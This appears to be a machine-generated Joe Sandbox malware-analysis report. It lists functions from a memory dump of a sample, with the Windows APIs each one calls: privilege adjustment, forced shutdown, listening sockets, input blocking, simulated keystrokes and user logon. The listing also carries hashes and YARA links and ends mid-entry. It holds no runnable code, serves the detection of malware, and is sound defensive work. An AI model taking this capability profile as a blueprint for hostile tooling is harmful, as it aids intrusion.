Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstMessageNextPeekSleep_memmove
String ID: *.*
API String ID: 2185952417-438819550
Opcode ID: 10f1be6cc76f2f529757842be93c55e4e8a946d2761922060bc18649a36a7e1b
Instruction ID: 4296dd3a4b2c87079d0f749a76ea650b4498d5511c1f14ccd1059bdfa300f8ef
Opcode Fuzzy Hash: 10f1be6cc76f2f529757842be93c55e4e8a946d2761922060bc18649a36a7e1b
Instruction Fuzzy Hash: F6417D7194021EAFDF14DFA4CD59AEEBBB4FF05351F144566F814A3291EB309A88CB90

Function 00A55778 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00A49399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00A493E3
Part of subcall function 00A49399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00A49410
Part of subcall function 00A49399: GetLastError.KERNEL32 ref: 00A4941D

ExitWindowsEx.USER32(?,00000000), ref: 00A557B4

Strings

@, xrefs: 00A557A7
SeShutdownPrivilege, xrefs: 00A55784
, xrefs: 00A557A2

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: 93422a33a42a146acefe705ce4b039233cd0f55aa61822802d71967aab8fda9d
Instruction ID: 3ccb17b8bc6fd7e84a3a91d2dcdeeb7b8865d03891e65f799f5bc390b84b893e
Opcode Fuzzy Hash: 93422a33a42a146acefe705ce4b039233cd0f55aa61822802d71967aab8fda9d
Instruction Fuzzy Hash: 3601F731E51712EAE76863B59CAAFBB7268FB0D752F200829FD13D60D2EA705C0C8160

Function 00A6696E Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00A669C7
WSAGetLastError.WSOCK32(00000000), ref: 00A669D6
bind.WSOCK32(00000000,?,00000010), ref: 00A669F2
listen.WSOCK32(00000000,00000005), ref: 00A66A01
WSAGetLastError.WSOCK32(00000000), ref: 00A66A1B
closesocket.WSOCK32(00000000,00000000), ref: 00A66A2F

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 12a1db40e58c0bd1a03ff4420345b0bddbd54cefbb2e55893ea35a50d3dcf453
Instruction ID: 96d804ea5f6f0ca75ef9ce2d3183aade9857d244f7a338ea2c81590179f6ba1b
Opcode Fuzzy Hash: 12a1db40e58c0bd1a03ff4420345b0bddbd54cefbb2e55893ea35a50d3dcf453
Instruction Fuzzy Hash: 9421D0316006049FCB10EFA8C989F3EB7B9EF84720F148258E916A73D1CB30AC05CB90

Function 009F1663 Relevance: 7.9, APIs: 5, Instructions: 379COMMON

Download Yara Rule

APIs

Part of subcall function 009F29E2: GetWindowLongW.USER32(?,000000EB), ref: 009F29F3

DefDlgProcW.USER32(?,?,?,?,?), ref: 009F1DD6
GetSysColor.USER32(0000000F), ref: 009F1E2A
SetBkColor.GDI32(?,00000000), ref: 009F1E3D

Part of subcall function 009F166C: DefDlgProcW.USER32(?,00000020,?), ref: 009F16B4

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: ColorProc$LongWindow
String ID:
API String ID: 3744519093-0
Opcode ID: 171c03de87d23f6db1e3a9d5fa753385c6e385d313a25af64dea6bcc70b8d259
Instruction ID: 4835eaf46f95a9a2cb20f6213f2087c7f4bfbb31982de7af4f2f51ff5ff127f2
Opcode Fuzzy Hash: 171c03de87d23f6db1e3a9d5fa753385c6e385d313a25af64dea6bcc70b8d259
Instruction Fuzzy Hash: 63A1547011541CFBD628AB6D9C49EBF3ABDDB81315F25862AF602D61D2CB299C02C3F5

Function 00A5C2FF Relevance: 7.6, APIs: 5, Instructions: 143fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00A5C329
_wcscmp.LIBCMT ref: 00A5C359
_wcscmp.LIBCMT ref: 00A5C36E
FindNextFileW.KERNEL32(00000000,?), ref: 00A5C37F
FindClose.KERNEL32(00000000,00000001,00000000), ref: 00A5C3AF

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNext
String ID:
API String ID: 2387731787-0
Opcode ID: b29d0b1d22fd990435a416d8b90d1399f66b23b3bb2c264f2b2f8efa29ba0710
Instruction ID: f351a40cd05d1abad599e89b2a27fa559c3cc40367dbe5921875a2f9023bd3ed
Opcode Fuzzy Hash: b29d0b1d22fd990435a416d8b90d1399f66b23b3bb2c264f2b2f8efa29ba0710
Instruction Fuzzy Hash: CC5199356047069FC714DF68D494EAAB3E8FF49321F10861DE95A8B3A1DB30AD09CB91

Function 00A66E32 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00A68475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00A684A0

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00A66E89
WSAGetLastError.WSOCK32(00000000), ref: 00A66EB2
bind.WSOCK32(00000000,?,00000010), ref: 00A66EEB
WSAGetLastError.WSOCK32(00000000), ref: 00A66EF8
closesocket.WSOCK32(00000000,00000000), ref: 00A66F0C

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: ErrorLast$bindclosesocketinet_addrsocket
String ID:
API String ID: 99427753-0
Opcode ID: 5646044a81f605517cdf785d163871d9ec9733282161d86bf688c4297950d500
Instruction ID: 0ac147e3a2f1d158608ae83c7b0a11cf57bc2fb297fc5c49f47662c1f29896e8
Opcode Fuzzy Hash: 5646044a81f605517cdf785d163871d9ec9733282161d86bf688c4297950d500
Instruction Fuzzy Hash: B341D375640604AFDB10AF64DC86F7F77A8DB84710F048558FA16AB3D2DB70AD018BA1

Function 00A759B3 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00A75A02
IsWindowEnabled.USER32 ref: 00A75A10
GetForegroundWindow.USER32(?,?,00000001), ref: 00A75A1D
IsIconic.USER32 ref: 00A75A2B
IsZoomed.USER32 ref: 00A75A39

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: bc9c4d45ea4620834753fc69cd9688a19e5bc72ba6aaa4058640f75e7f7d1eea
Instruction ID: 5e8bc096ca60b2a56e5d313f951a8a3915df405fae5123555b9a3e02cf91a014
Opcode Fuzzy Hash: bc9c4d45ea4620834753fc69cd9688a19e5bc72ba6aaa4058640f75e7f7d1eea
Instruction Fuzzy Hash: CC118672B00A159FE7115F769C84B2E7B99EF84761F05C139E949D7241DBB0A9028BA0

Function 00A30030 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00A30034
__swprintf.LIBCMT ref: 00A30065

Strings

WIN_XPe, xrefs: 00A300A4
%.3d, xrefs: 00A3003F

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: dc7312a1b767bcd045201c6e78949871a0420c9448f1746ff9112fa61023c88d
Instruction ID: c19bc001caebfa13f5d47480da30a5e8450a6c0e710835df523019b7881eed90
Opcode Fuzzy Hash: dc7312a1b767bcd045201c6e78949871a0420c9448f1746ff9112fa61023c88d
Instruction Fuzzy Hash: 7FD01272858108EACB4CDB90C954EFA777CBB06300F100452F606E2040E33587889B26

Function 00A629BA Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00A61ED6,00000000), ref: 00A62AAD
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00A62AE4

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: c8de0cec273e9b61a96a18ed36d4f017adad1f2ede203d37d9a4d47be7e34847
Instruction ID: e30a0b02874cecb91ecb457cd538a4d32cd54895ac0f0d439c374e0e9d6c1907
Opcode Fuzzy Hash: c8de0cec273e9b61a96a18ed36d4f017adad1f2ede203d37d9a4d47be7e34847
Instruction Fuzzy Hash: 14419471A04A09BFEB20DF94CD85FBBB7BCEB50794F10406AF605A7181DAB19E819760

Function 00A49399 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00A10FE6: std::exception::exception.LIBCMT ref: 00A1101C
Part of subcall function 00A10FE6: __CxxThrowException@8.LIBCMT ref: 00A11031

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00A493E3
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00A49410
GetLastError.KERNEL32 ref: 00A4941D

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: 784e1938275d3277419d4c524568ab69621cdfa7070936eb5f69b0d06942fbf1
Instruction ID: 135948d9c1da09736f199b868a9225adefa4f2cc9ad898d560613424891e64a2
Opcode Fuzzy Hash: 784e1938275d3277419d4c524568ab69621cdfa7070936eb5f69b0d06942fbf1
Instruction Fuzzy Hash: 5D1191B1414205AFD728DF54DD86D6BB7BCEB48710B21852EF45997240EB70BC52CB60

Function 00A542D5 Relevance: 4.6, APIs: 3, Instructions: 61fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00A542FF
DeviceIoControl.KERNEL32(00000000,002D1400,00000007,0000000C,?,0000000C,?,00000000), ref: 00A5433C
CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00A54345

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: 7dab561500f1b9b298c8f5531d0add299029422ef100779629f4537a6b9cbbdd
Instruction ID: ea893b17f0ea37325675ac0c344418d41ac2b76722c40b0b48fdd183b8806827
Opcode Fuzzy Hash: 7dab561500f1b9b298c8f5531d0add299029422ef100779629f4537a6b9cbbdd
Instruction Fuzzy Hash: 561186B1900225BEE710DBE8DC48FEFB7BCEB08725F000256BD14E71A0D2745D4587A1

Function 00A54F1C Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00A54F45
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00A54F5C
FreeSid.ADVAPI32(?), ref: 00A54F6C

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: a8da333a212b94289cdcfea31ee87a16efcb09227549c58878ac86fa66624cf5
Instruction ID: 38f8841cdca3946fdb79915d874c62774274e7bb234c7002faeff4937661e717
Opcode Fuzzy Hash: a8da333a212b94289cdcfea31ee87a16efcb09227549c58878ac86fa66624cf5
Instruction Fuzzy Hash: 45F04975A1130CBFDF00DFE4DC89EAEBBBCEF08201F0044A9A901E2180E7356A488B50

Function 00A51AC6 Relevance: 3.0, APIs: 2, Instructions: 32keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00A51B01
keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00A51B14

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: b70f79f15e24630534d2ebd9c6a9bddc40232088d3bcf6799b0f4fabd135cbd6
Instruction ID: c7cb1d2c2c7d86077b41d7b0ae97101f352fd24417d57aa8b7ed58ecc474f690
Opcode Fuzzy Hash: b70f79f15e24630534d2ebd9c6a9bddc40232088d3bcf6799b0f4fabd135cbd6
Instruction Fuzzy Hash: E3F0497190020DABDB04DF94C805BFE7BB4FF04316F00804AFD5596292D3799619DFA4

Function 00A5A6AD Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,00A69B52,?,00A8098C,?), ref: 00A5A6DA
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,?,?,00A69B52,?,00A8098C,?), ref: 00A5A6EC

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 8c0478775dbe9d7edfed6a2096ff334616d64a825144007c06d3334700100519
Instruction ID: aabc3714ac756399440cca84faada3d30ad5a68351859237c899e47a1a44e3d0
Opcode Fuzzy Hash: 8c0478775dbe9d7edfed6a2096ff334616d64a825144007c06d3334700100519
Instruction Fuzzy Hash: 4AF0A73550422DBBDB20AFA4DC48FEB77ACFF19361F008255B908D6181D6709945CBE1

Function 00A48DE9 Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00A48F27), ref: 00A48DFE
CloseHandle.KERNEL32(?,?,00A48F27), ref: 00A48E10

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 1129716617db685f456461cbfe66c8cddd27c1bd6e0ff72ea8f15124dcb84e49
Instruction ID: 03ae285ca37df9e6ea9ba6867268d93b0af23a54eeb43bcc7233ec611cdb1e90
Opcode Fuzzy Hash: 1129716617db685f456461cbfe66c8cddd27c1bd6e0ff72ea8f15124dcb84e49
Instruction Fuzzy Hash: A8E0E675010610EFE7656B50FD09DB777BDEF04310714891DF55584470DB619CD1DB50

Function 00A1A385 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00A18F87,?,?,?,00000001), ref: 00A1A38A
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00A1A393

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 54d7b35f7349a30415d8ec93347081044a3a92bba6229b55510f389dfde4c992
Instruction ID: 6fe3994e5b7365ca2f6b5e96d28b36fcdd9d37c4880adbf32f569de6bb8bd9d4
Opcode Fuzzy Hash: 54d7b35f7349a30415d8ec93347081044a3a92bba6229b55510f389dfde4c992
Instruction Fuzzy Hash: B2B09231064308ABCA806BD1EC09F883F68EB46A62F004010F60D48060CB6254568B91

Function 00A645D5 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 00A645F0

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 34dd846fe1df842e0322a0e121c83fd32da445dfb03c8bc6e9badb076063e2ae
Instruction ID: 774bb41de173d82ea39ade78c2ad8182dab6faf89130dd0dbbabd944c3ce3e75
Opcode Fuzzy Hash: 34dd846fe1df842e0322a0e121c83fd32da445dfb03c8bc6e9badb076063e2ae
Instruction Fuzzy Hash: A2E01A352102199FD750AF99E804A9ABBE8AF98760F048426FE4AD7351DAB0AD418B91

Function 00A551E2 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00A55205

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: 194c5a6ca2052aa85fb96802b666096e31490725b2a1101f26401b52cd903d9d
Instruction ID: 397a9180be8470b2be46bf11261bf34e576a155123a915dd7d11daa1a5afbf9c
Opcode Fuzzy Hash: 194c5a6ca2052aa85fb96802b666096e31490725b2a1101f26401b52cd903d9d
Instruction Fuzzy Hash: 38D017A4960E0928E85823B49A2FF360A08BB007C2F8443497802850C1A8B0584DD431

Function 00A49369 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00A48FA7), ref: 00A49389

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
